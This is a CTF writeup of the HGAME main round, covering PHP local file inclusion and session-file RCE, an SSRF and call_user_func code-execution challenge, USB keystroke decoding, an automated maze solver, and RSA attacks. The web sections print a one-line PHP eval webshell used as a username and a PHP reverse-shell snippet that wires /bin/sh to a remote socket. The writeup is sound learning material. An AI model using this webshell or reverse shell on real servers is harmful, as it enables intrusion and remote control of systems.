HGAME Main Round Writeup

#A few words first

I got a lot out of this HGAME and met many great people,

and of course thanks to them for going easy on me so I could take first place (1000 yuan~),

though I think the main reason was the sexy problem setter hammer solving problems with me live,

which is how I got them done. Really, many thanks.

I learned a lot from this contest; let me think it over slowly.

It has already been 3 days. The challenges are closed, so all I can do is write the writeup..

#web1

LFI RCE

First up is web1. It opened with a page that looked very much like a challenge I did at N1ctf over the weekend.

The page was index.php, and seeing a username box and a password box I kept thinking about logging in via SQL injection.

Later the setter Alias gave us the hint that it was LFI. I captured the traffic with Burp Suite and found a login request, and I actually

thought the LFI was there.. and then got stuck.

Until the last hour, when I couldn't do any other challenge and started DMing the setter =。=

The setter was really fun. He started by asking: you've just entered a site

and found a login form, what do you do first? I thought a bit and said without hesitation: SQL injection!

Thinking about it now =。= of course you register first. So I went to registe.php and found I could register.

After registering I logged in to the main page, and there I saw the LFI entry point.

With a PHP stream wrapper you can read all of the source code:

php://filter/read=convert.base64-encode/resource=upload.php

Luckily I saved the source.

Auditing the code, the vulnerability is here:

(screenshot of the vulnerable code)

There is a whitelist, but it does not filter $ and [].

Register an account whose name is a one-line PHP webshell to control the SESSION, then include the session file path through the wrapper to get RCE:

<?php @eval($_POST[value]); ?> as the account name.

So the session file is /var/lib/php5/sess_ followed by the PHPSESSID above. And then I still didn't get it =。=

#Later I read 司大佬's blog

and learned about https://www.leavesongs.com/PHP/backshell-via-php.html,

which explains how to get a reverse shell in pure PHP, without relying on other languages:

// connect back to $ip:$port and wire stdin, stdout and stderr of /bin/sh to that socket
$sock = fsockopen($ip, $port);
$descriptorspec = array(0 => $sock, 1 => $sock, 2 => $sock);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

That is the core code =,= watching 司大佬 get a shell with it, unbeatable.

#web2 (SSRF)

This one was a real trap. hammer probably didn't expect us to be this bad; it really shows how important a sexy setter is.

First there was another login form. I figured SQL injection again, and when it wouldn't inject I despaired and gave up..

Coming back later, hammer gave a hint: weak password, and even provided a wordlist.....

I ran it through Burp and finally logged in. Opening F12 I found a directory,

typed it into the address bar, and landed at a place called gogogo.

After that it was SSRF, a local file read vulnerability. I kept using the http protocol,

and after another reminder from the setter I switched to the file protocol, then started auditing the code:

@$_ENV = $_POST;                          // the whole POST body becomes $_ENV
function MyCode($request){
    $_ENV[c] = base64_decode($_ENV[c]);   // 'c' is taken straight from the POST body
    print_r($request);
    $request($_ENV[c]);                   // calls whatever function name $request holds, with c as its argument
}
@call_user_func('MyCode', $_GET['func']); // $request comes from the func= query parameter

The core problem is PHP's call_user_func: the function name it passes in (and that $request() then calls) is user-controlled, and a quick Google shows this gives code execution.

Construct func as the name of a PHP function and c as the code for it to run, and you can execute Linux commands.

Using ls to list the current directory shows a readme.txt, and opening it gives the flag.

hammer said the original plan also included internal network pentesting, which is why you would first need a webshell.

Sadly I didn't know how to get a webshell, despair =。=

I feel like a total noob.

MISC

#MISC1 (my only first blood: USB traffic capture)

This one is mostly about reading a USB packet capture in Wireshark.

First open Wireshark.

Search online for usb_interrupt and you will understand what this USB capture is.

tshark -r pswd.pcap -T fields -e usb.capdata | grep -E "^.{23}$" | grep -v 00:00:00:00:00:00:00:00 > data.txt

That exports all of the USB data

into a file like this (screenshot of data.txt). Then run it through a script; I put the script on my blog, since Jianshu doesn't render it well =。=

Type along with the pinyin and you get the flag.
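The decoding script the post refers to lives on the author's blog; as an added example (not the author's script), here is a decoder for the 8-byte HID boot-keyboard reports that the tshark line above extracts, run over constructed sample lines rather than the real pswd.pcap. It also handles shifted keys and Backspace, which the simplest key-to-letter mapping misses.

```python
import re
# USB HID usage id -> (unshifted, shifted) character, for the keys a boot-protocol keyboard sends
HID_KEYS = {}
for i, ch in enumerate('abcdefghijklmnopqrstuvwxyz'):
    HID_KEYS[0x04 + i] = (ch, ch.upper())
for i, (lo, hi) in enumerate(zip('1234567890', '!@#$%^&*()')):
    HID_KEYS[0x1e + i] = (lo, hi)
HID_KEYS.update({
    0x28: ('\n', '\n'), 0x2c: (' ', ' '), 0x2d: ('-', '_'), 0x2e: ('=', '+'),
    0x2f: ('[', '{'), 0x30: (']', '}'), 0x31: ('\\', '|'), 0x33: (';', ':'),
    0x34: ("'", '"'), 0x36: (',', '<'), 0x37: ('.', '>'), 0x38: ('/', '?'),
})
REPORT_RE = re.compile(r'^(?:[0-9a-fA-F]{2}:){7}[0-9a-fA-F]{2}$')  # the 23-char lines the grep keeps
def decode_reports(lines):
    """Turn usb.capdata lines (aa:bb:...:hh, one 8-byte report each) into the typed text."""
    typed = []
    for line in lines:
        line = line.strip()
        if not REPORT_RE.match(line):
            continue                      # header, empty or non-keyboard line
        report = bytes.fromhex(line.replace(':', ''))
        modifiers, keycode = report[0], report[2]   # byte 1 is reserved, bytes 2-7 are pressed keys
        if keycode == 0:
            continue                      # key-release report: nothing new was typed
        if keycode == 0x2a:               # Backspace: drop the previous character
            if typed:
                typed.pop()
            continue
        shifted = bool(modifiers & 0x22)  # bit 1 = left shift, bit 5 = right shift
        if keycode in HID_KEYS:
            typed.append(HID_KEYS[keycode][1 if shifted else 0])
    return ''.join(typed)
# constructed sample in the format "tshark -e usb.capdata" emits (not from the challenge pcap):
# keys h g a m e { t e x <Backspace> s t }, so the typo is corrected to hgame{test}
SAMPLE = """00:00:0b:00:00:00:00:00
00:00:0a:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:10:00:00:00:00:00
00:00:08:00:00:00:00:00
02:00:2f:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:1b:00:00:00:00:00
00:00:2a:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:17:00:00:00:00:00
20:00:30:00:00:00:00:00"""

if __name__ == '__main__':
    print(decode_reports(SAMPLE.splitlines()))
```

Feed it data.txt line by line to decode a real capture; if the keyboard in the pcap types pinyin, the output is the pinyin, and the flag still has to be typed out from it.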

#MISC3 (Python maze walking)

I would call this one PPC: all of the code has to be written on the spot, but it is still fairly simple.

Automatic maze solving =、= the main code is here:

import re
import requests

BASE = 'http://111.230.105.104:5000'
se = requests.session()
se.get(BASE + '/login')
# any username works; the response already contains the first maze
h = se.get(BASE + '/login?username=dsafa')

def parse_maze(html):
    # one <li> per row; the page's '1' is a passable cell (stored as 0) and '0' is a wall (stored as 1)
    rows = re.findall(r'<li>(.*?)</li>', html)
    return [[0 if ch == '1' else 1 for ch in row if ch in '01'] for row in rows]

def solve(grid):
    # depth-first search from [0, 0] to [n, n] with backtracking; the maze is square
    n = len(grid) - 1
    stack = [[0, 0]]
    history = [[0, 0]]          # cells already tried are never tried a second time
    moves = [(0, -1), (0, 1), (-1, 0), (1, 0)]   # up, down, left, right
    while stack[-1] != [n, n]:
        cur = stack[-1]
        for da, db in moves:
            nxt = [cur[0] + da, cur[1] + db]
            if not (0 <= nxt[0] <= n and 0 <= nxt[1] <= n):
                continue            # off the board
            if nxt in history or grid[nxt[0]][nxt[1]] == 1:
                continue            # already visited, or a wall
            stack.append(nxt)
            history.append(nxt)
            break
        else:
            stack.pop()             # dead end: back up one step

    return stack

for level in range(1, 6):
    grid = parse_maze(h.text)
    print(grid)
    route = solve(grid)
    print(route)
    payload = '?solve=' + '|'.join('{},{}'.format(a, b) for a, b in route)
    print(payload)
    url = BASE + '/level{}'.format(level) + payload
    h = se.get(url)
    print(url, h.text)
    print(h.url)

Solves the maze instantly!! Super fast.

CRYPTO

At first I thought this was a low-exponent attack, since e could be taken very, very small,

but it ran for a long, long time with no result.

The low-exponent attack code:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import gmpy2, time

n=20009825321190817147963347442051848645000336424386939346276080303892938830978468883865096939010369211164496889554066362250659588656220842298166858655661318127372829597289087967547380136236626386470544343488308698913083828327292168712942475361870205910005035784342397506041791253029844494366387369699503134262891657189794050207749021028042635934918483017590572519580475948828187908443010713579723232915388260644322050961965307559877185043552130449517605233267873185739089790172109615861449171354606776131859765582549508046458007187356147775319574096663927646674967596503275755780154113292912277977650441567509457140143
e=2
c=11276768387639406169997533231062879430250136462512305127468735804849144724322098825651714250497166921684637563615970313478015998022841728073463694100833054875547140603479102218063033283024559033814543704665745305248197661146142121489172277735609441674723512858942001843838519086085091246645803803954875859233140684712680996684763144909422624752609564963732987239868247045418557656861860399004635444939531315079261663096466536784791883115937389245561776662381289412756713590876961018174315777429441413604654165274391861765190068056444464207139020429656290530404739547061849380150209984938360867220233189580698079032411
i=0
print('n=', n)
print('c=', c)

print('[+]Detecting m...')
s = time.perf_counter()   # time.clock() no longer exists in Python 3.8+

# textbook RSA with e=2: m^2 = c + i*n for some i, so search for an exact square root
while 1:
    m, b = gmpy2.iroot(c + i * n, e)
    if b:
        m = int(m)
        # Python 3 str has no .decode('hex'); convert the integer to its bytes instead
        print('  [-]m is: ' + m.to_bytes((m.bit_length() + 7) // 8, 'big').decode('latin-1'))
        break
    print('  [-]i = %d\r' % i, end='')
    i = i + 1
print('[!]Timer:', round(time.perf_counter() - s, 2), 's')

After dinner I searched again and found there is also a common modulus attack:

#coding=utf-8
import sys
from libnum import n2s
sys.setrecursionlimit(100000)

def egcd(a, b):
    # extended Euclid: returns (g, x, y) with a*x + b*y == g
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

def main():
    n=20009825321190817147963347442051848645000336424386939346276080303892938830978468883865096939010369211164496889554066362250659588656220842298166858655661318127372829597289087967547380136236626386470544343488308698913083828327292168712942475361870205910005035784342397506041791253029844494366387369699503134262891657189794050207749021028042635934918483017590572519580475948828187908443010713579723232915388260644322050961965307559877185043552130449517605233267873185739089790172109615861449171354606776131859765582549508046458007187356147775319574096663927646674967596503275755780154113292912277977650441567509457140143
    e1=2
    c1=11276768387639406169997533231062879430250136462512305127468735804849144724322098825651714250497166921684637563615970313478015998022841728073463694100833054875547140603479102218063033283024559033814543704665745305248197661146142121489172277735609441674723512858942001843838519086085091246645803803954875859233140684712680996684763144909422624752609564963732987239868247045418557656861860399004635444939531315079261663096466536784791883115937389245561776662381289412756713590876961018174315777429441413604654165274391861765190068056444464207139020429656290530404739547061849380150209984938360867220233189580698079032411
    e2=3
    c2=16452779450763971914698811803290894636946434233714240923652445151181235307730429230871917234313847776379269766015102031787432279967530714524593748669312007144984943102312569656652223054616094129029205448272347999621516346713482991540344552871019415848552344771877131758918795007204873493465573061262369041506025857598595789892854705303491632611693656149181574894384070822263780505875081262497155669358233585529665242779267340189298466267898266958632397542263440571419017299620165710998158797975480780443930675580678078416622088114976015059479550018213099890092963341616530135219960729222370369694327396683747010751415

    # s1*e1 + s2*e2 == 1, so c1^s1 * c2^s2 == m (mod n)
    s = egcd(e1, e2)
    s1 = s[1]
    s2 = s[2]
    # a negative exponent means using the modular inverse of that ciphertext
    if s1 < 0:
        s1 = -s1
        c1 = modinv(c1, n)
    elif s2 < 0:
        s2 = -s2
        c2 = modinv(c2, n)
    m = (pow(c1, s1, n) * pow(c2, s2, n)) % n
    print(m)
    print(n2s(m))

if __name__ == '__main__':
    main()

Ran it:

This one was also tricky.. the answer was actually hidden inside the output, and I kept thinking it was fake.
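An added example (not the two scripts above) that puts both attacks side by side on a constructed toy modulus built from two known primes: the e=2 root search only succeeds when m^2 barely exceeds n, while the common modulus attack recovers m whenever the two exponents are coprime. It handles a negative coefficient on either ciphertext and needs only the standard library (Python 3.8+ for pow(x, -1, n)).

```python
from math import isqrt

def egcd(a, b):
    """Extended Euclid: (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - (a // b) * y

def small_root_attack(c, n, max_k=10_000):
    """e=2 without padding: m^2 = c + k*n for some k; only feasible when k is small."""
    for k in range(max_k):
        r = isqrt(c + k * n)
        if r * r == c + k * n:
            return r
    return None   # m^2 is far larger than n, so k is astronomically large: give up

def common_modulus_attack(c1, e1, c2, e2, n):
    """Same n and m, coprime e1 and e2: find a*e1 + b*e2 = 1, then m = c1^a * c2^b mod n."""
    g, a, b = egcd(e1, e2)
    if g != 1:
        raise ValueError('e1 and e2 must be coprime')
    # a negative coefficient means using the modular inverse of that ciphertext
    if a < 0:
        c1, a = pow(c1, -1, n), -a
    if b < 0:
        c2, b = pow(c2, -1, n), -b
    return (pow(c1, a, n) * pow(c2, b, n)) % n

# constructed toy modulus from two known primes (2^61-1 and 2^31-1); not the challenge's n
P, Q = 2305843009213693951, 2147483647
N = P * Q

def recover(m):
    """Encrypt m with e=2 and e=3 under N; return (root-attack result, common-modulus result)."""
    c1, c2 = pow(m, 2, N), pow(m, 3, N)
    return small_root_attack(c1, N), common_modulus_attack(c1, 2, c2, 3, N)

if __name__ == '__main__':
    print(recover(123456789))   # small m: both attacks return 123456789
    print(recover(2 ** 61))     # m^2 >> N: only the common-modulus attack returns 2**61
```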
